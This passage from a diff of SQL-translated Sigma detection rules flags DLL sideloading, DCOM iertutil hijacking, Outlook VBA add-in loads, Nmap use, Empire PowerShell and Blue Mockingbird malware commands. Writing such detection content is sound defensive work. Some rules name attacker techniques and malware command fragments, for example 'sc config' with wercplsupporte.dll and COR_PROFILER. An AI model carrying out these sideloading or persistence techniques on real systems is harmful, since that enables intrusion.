'%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\firewallapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\miutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntdsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxtheme.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmde.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wofutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lrwizdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wldp.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml" + "filename": "image_load_side_load_from_non_system_location.yml" }, { - "title": "PUA - Nmap/Zenmap Execution", - "id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", + "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", "status": "test", - "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", - "author": "frack113", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ - "Network administrator computer" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nmap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 'zennmap.exe')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_nmap_zenmap.yml" + "filename": "image_load_dcom_iertutil_dll_hijack.yml" }, { - "title": "Blue Mockingbird", - "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", + "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", + "id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", "status": "test", - "description": "Attempts to detect system changes made by Blue Mockingbird", - "author": "Trent Liffick (@tliffick)", + "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1112", - "attack.t1047" + "attack.t1204.002" ], "falsepositives": [ - "Unknown" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_blue_mockingbird.yml" + "filename": "image_load_office_outlook_outlvba_load.yml" }, { - "title": "HackTool - Empire PowerShell Launch Parameters", - "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", - "status": "test", - "description": "Detects suspicious powershell command line parameters used in Empire", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential DLL Sideloading Via VMware Xfer", + "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", + "status": "experimental", + "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + 